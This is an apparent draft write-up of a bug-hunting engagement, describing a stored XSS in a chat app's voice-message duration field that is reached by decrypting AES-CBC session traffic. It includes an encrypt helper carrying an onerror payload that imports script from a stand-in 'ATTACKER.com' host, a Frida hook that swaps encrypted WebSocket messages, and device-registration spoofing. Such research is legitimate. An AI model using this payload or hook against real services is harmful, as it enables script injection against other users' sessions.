notes

Maybe mention at the beginning that it also has an app, which mirrors the web app?

Introduction

During an engagement, I found that the length of a voice message in a chat ended up in an innerHTML sink. Exploiting it, however, turned out to be an adventure in itself, involving reverse engineering an AES encryption implementation, hooking WebSocket traffic with Frida and simulating a physical device.

A simple innerHTML sink

This started the way a lot of findings do: staring at JavaScript and looking for something interesting.

This target had a lot of features, one of them being a chat. You could have two-person chats or group chats, and if the option was enabled, anyone could join a group chat. While analyzing the client-side source code, and more specifically an innerHTML sink, I noticed that the duration of a voice message, meant to display the length of the audio clip, was rendered without sanitization. Good, but first of all, we need to understand whether we can manipulate this field.
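To make the sink concrete, here is a minimal sketch of the pattern. The function names and the CSS class are hypothetical and not taken from the target; the only thing the sketch assumes is that the duration is concatenated into markup that later gets assigned to innerHTML.

```javascript
// Hypothetical reconstruction of the vulnerable pattern; names are illustrative.
function renderDurationUnsafe(duration) {
    // The value is concatenated as-is, so any HTML inside it is parsed once
    // the resulting string is assigned to element.innerHTML.
    return '<span class="voice-duration">' + duration + '</span>';
}

// One possible fix: escape HTML metacharacters before building the markup.
function escapeHtml(value) {
    return String(value)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

function renderDurationSafe(duration) {
    return '<span class="voice-duration">' + escapeHtml(duration) + '</span>';
}

const probe = '5</span><img src=x onerror=alert(1)><span>';
console.log(renderDurationUnsafe('5'));   // benign value
console.log(renderDurationUnsafe(probe)); // markup is injected
console.log(renderDurationSafe(probe));   // markup is neutralized
```

Assigning the value through textContent instead of innerHTML would avoid the problem without any escaping helper.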

Something I noticed after a while was that there was no option to send a voice message anywhere, which left me confused. Then I noticed that, despite the interfaces being the same, the app only displayed the voice message button if it considered your device to be mobile. OK, so there are various ways to work around this limitation, but for now we can just open DevTools and click "Toggle device toolbar" to simulate a mobile phone.

Everything is Encrypted

It did not take long to discover that chat interactions were sent over WebSockets and encrypted. But the encryption was probably done client-side, so I was confident I could confirm that. And so, after some time reverse engineering and reading JavaScript, I concluded that every interaction was AES-CBC encrypted with session-specific keys. Basically:

  • Key (x): dynamic key, unique per session
  • IV (y): initialization vector, also unique per session
  • Mode: AES-CBC with PKCS7 padding

This meant that, to understand what was happening and possibly inject my payload, I needed to:

  • Obtain the session's AES key and IV
  • Decrypt a valid message and understand the content
  • Modify the field I need
  • Encrypt it again
  • Replace a legitimate encrypted message with mine, or check whether I can send a message manually

Understanding the Message Flow

Since we absolutely need to understand how messages, and specifically voice messages, work, it was time for a combination of static analysis and runtime debugging! After a long while, I mapped out the following:

  1. User records a voice message in either the app or the mobile browser
  2. App uploads the audio file and gets a URL
  3. App creates a JSON object with metadata, which includes a duration field
  4. JSON is encrypted with the session keys
  5. The encrypted payload is sent via WebSocket
  6. Server relays it to the recipient
  7. Recipient decrypts and renders it, which includes the vulnerable innerHTML

So, the encryption happened client-side and the server just relayed the encrypted blobs. This meant that if I could intercept a message before encryption or modify the encrypted output, I could inject anything.

Extracting Session Keys

Where do the AES keys come from? After more reverse engineering, I found they're exchanged during session setup (it seems simple, but it took some time to put everything together):

  1. User creates or joins a group chat
  2. Attacker calls /endpoint1 and the server returns the value of variable1
  3. Attacker calls /endpoint2 with the variable1 value
  4. Server responds with key and IV
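As a rough sketch, the exchange above could be scripted as follows. The paths /endpoint1 and /endpoint2 and the name variable1 are the redacted placeholders used in this write-up; the HTTP methods, the JSON request and response shapes, and the fetchSessionKeys helper itself are assumptions. Authentication (cookies, tokens) is left out entirely.

```javascript
// Sketch of the two-step key exchange. Methods and JSON shapes are assumed,
// not confirmed by the target. Requires a fetch implementation (browser or
// Node 18+), or one passed in explicitly as the second argument.
async function fetchSessionKeys(baseUrl, fetchImpl = fetch) {
    // Step 1: obtain the intermediate value.
    const first = await fetchImpl(baseUrl + '/endpoint1');
    const { variable1 } = await first.json();

    // Step 2: exchange it for the session key and IV.
    const second = await fetchImpl(baseUrl + '/endpoint2', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ variable1 }),
    });
    const { key, iv } = await second.json();
    return { key, iv };
}
```

Passing the fetch implementation as a parameter keeps the helper easy to exercise against a stub before pointing it at a real session.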

Now that I had the keys, it was time to decrypt the messages and check what was being sent over WebSockets.

I created two functions to help me, one to encrypt payloads and the other to decrypt them. They looked like this:

import CryptoJS from 'crypto-js';

// Encrypt a plaintext string with AES-CBC/PKCS7 and return it Base64-encoded.
function aesEncrypt(plaintext, key, iv) {
    // Key and IV are plain strings, parsed as UTF-8 bytes.
    const keyBytes = CryptoJS.enc.Utf8.parse(key);
    const ivBytes = CryptoJS.enc.Utf8.parse(iv);
    const encrypted = CryptoJS.AES.encrypt(plaintext, keyBytes, {
        iv: ivBytes,
        mode: CryptoJS.mode.CBC,
        padding: CryptoJS.pad.Pkcs7
    });
    return encrypted.toString(); // Base64
}

const x = 'something'; // Session key
const y = 'somethingelse'; // Session IV

const payload = JSON.stringify({
    url: "...",
    messageId: "...",
    duration: "100</span><img src=x onerror=import('//ATTACKER.com')><span>",
    // ... other fields
});

console.log(aesEncrypt(payload, x, y));

The decrypt function is simply the inverse: the same key, IV, mode and padding, applied with CryptoJS.AES.decrypt.
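For reference, a decryption counterpart might look like the sketch below. It uses Node's built-in crypto module rather than CryptoJS so it runs without extra dependencies, and it is not the original helper. It assumes the key and IV are UTF-8 strings of valid AES lengths (a 16, 24 or 32 byte key and a 16 byte IV); the function names are made up for this example.

```javascript
const nodeCrypto = require('crypto');

// Pick the AES variant from the key length, e.g. 16 bytes -> aes-128-cbc.
function algorithmFor(keyBytes) {
    return 'aes-' + keyBytes.length * 8 + '-cbc';
}

// Decrypt a Base64 ciphertext with AES-CBC; Node applies PKCS7 padding by default.
function aesDecryptNode(ciphertextBase64, key, iv) {
    const keyBytes = Buffer.from(key, 'utf8');
    const ivBytes = Buffer.from(iv, 'utf8');
    const decipher = nodeCrypto.createDecipheriv(algorithmFor(keyBytes), keyBytes, ivBytes);
    return Buffer.concat([
        decipher.update(ciphertextBase64, 'base64'),
        decipher.final(),
    ]).toString('utf8');
}

// Matching encrypt helper, included only so the round trip can be checked.
function aesEncryptNode(plaintext, key, iv) {
    const keyBytes = Buffer.from(key, 'utf8');
    const ivBytes = Buffer.from(iv, 'utf8');
    const cipher = nodeCrypto.createCipheriv(algorithmFor(keyBytes), keyBytes, ivBytes);
    return Buffer.concat([
        cipher.update(plaintext, 'utf8'),
        cipher.final(),
    ]).toString('base64');
}

// Example values only; a real session supplies its own key and IV.
const demoKey = '0123456789abcdef';
const demoIv = 'fedcba9876543210';
const demoCiphertext = aesEncryptNode('{"duration":"5"}', demoKey, demoIv);
console.log(aesDecryptNode(demoCiphertext, demoKey, demoIv));
```

A round trip like this is a quick sanity check that the key, IV and mode are right before trying to decrypt captured traffic.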

Crafting the Payload

The original voice message decrypted JSON looked something like this:

{
    "url": "https://target.com/uploads/voicemessage123",
    "duration": "5",
    "messageId": "123456",
    [ other fields ]
}
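Starting from a decrypted message like the one above, the crafting step amounts to replacing a single field. The sketch below assumes the field names from the sample JSON; the craftPayload helper and the alert-based marker are illustrative only.

```javascript
// Replace only the duration field of a decrypted voice message.
function craftPayload(decryptedJson, injectedDuration) {
    const message = JSON.parse(decryptedJson);
    // Every other field is left untouched so the message keeps the shape of
    // a legitimate voice message.
    message.duration = injectedDuration;
    return JSON.stringify(message);
}

// Sample values copied from the decrypted message shown above.
const original = JSON.stringify({
    url: 'https://target.com/uploads/voicemessage123',
    duration: '5',
    messageId: '123456',
});

// Like the payload shown earlier, this closes the surrounding <span> first.
const crafted = craftPayload(
    original,
    '5</span><img src=x onerror=alert(document.domain)><span>'
);
console.log(crafted);
```

The resulting string is what gets passed to the encrypt helper.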

Frida to the Rescue

OK, we can get our payload into a message and encrypt it. But how do we actually get it into the WebSocket stream?

Intercepting WebSockets isn't as straightforward as intercepting HTTP with proxies like Burp or Caido. Additionally, this requires an actual voice message being sent, so just sending our encrypted message over the WebSocket wouldn't work. However, the target had a mobile app which was basically the same environment as the web interface. As such, I could create a Frida script that intercepts the WebSocket layer and swaps the encrypted payload.

So, that's essentially what I did:

Java.perform(function () {
   const RealWebSocket = Java.use("okhttp3.internal.ws.RealWebSocket");

   RealWebSocket.send.overload('java.lang.String').implementation = function (message) {
       console.log("[->] Original:", message);

       if (message.startsWith('42')) {
           try {
               let dataArray = JSON.parse(message.substring(2));
               const eventName = dataArray[0];

               if (eventName === 'q_send_im_msg_ts') {
                   let innerPayload = JSON.parse(dataArray[1]);

                   // Replace with our malicious encrypted payload
                   innerPayload.msgData = "JdAHG/Wvsmcj6dWerfH0VKMp...";

                   dataArray[1] = JSON.stringify(innerPayload);
                   const modified = "42" + JSON.stringify(dataArray);

                   console.log("[<-] Modified:", modified);
                   return this.send(modified);
               }
           } catch (e) {
               console.log("[!] Error:", e);
           }
       }
       return this.send(message);
   };
});

Now I run it with `frida -U -f com.target.app -l hook.js`, and when I record a voice message inside a chat, the hook intercepts it, swaps the encrypted part for my XSS payload and sends it. The server accepts it and relays it to the victim, and the XSS fires!
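The rewrite logic inside the hook can also be pulled out into a plain function and checked with Node before attaching Frida to the app. The sketch below is one way to do that. The "42" prefix (which matches Socket.IO's event packet framing), the event name and the msgData field come from the hook above; the swapMsgData name is an assumption for this example.

```javascript
// Offline version of the rewrite performed inside the hook.
const TARGET_EVENT = 'q_send_im_msg_ts';

function swapMsgData(frame, replacementMsgData) {
    // Only event frames ("42" followed by a JSON array) are candidates.
    if (typeof frame !== 'string' || !frame.startsWith('42')) {
        return frame;
    }
    try {
        const dataArray = JSON.parse(frame.substring(2));
        if (!Array.isArray(dataArray) || dataArray[0] !== TARGET_EVENT) {
            return frame;
        }
        // The second element is itself a JSON string, so it is parsed again.
        const innerPayload = JSON.parse(dataArray[1]);
        innerPayload.msgData = replacementMsgData;
        dataArray[1] = JSON.stringify(innerPayload);
        return '42' + JSON.stringify(dataArray);
    } catch (e) {
        // Anything that does not parse is passed through unchanged.
        return frame;
    }
}
```

Returning the frame unchanged on any mismatch or parse error mirrors the fall-through in the hook, so unrelated traffic keeps flowing while the script is attached.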

Simulating a Physical Device

At this point I had a working XSS, but to create a public group chat, I had to...

I was too deep into this to just let it go. So I initially spent a lot of time digging through the JavaScript and Java from the mobile app to understand how devices were actually registered. I finally managed to work out the HTTP request needed for that, but I was missing something: a real device ID.

I had no way to get one, but I was determined. I spent a lot of time digging through user forums, setup guides and any kind of public discussion. And finally, in an obscure troubleshooting post, someone had shared their device ID while asking for help.

Note: device IDs are not sensitive, private or individual. They are just an ID for the device model, which is the same for every device of that model.

With a device ID in hand, I could now simulate a device connection. I registered a device to my test account and created a public group chat. Now the attack was complete.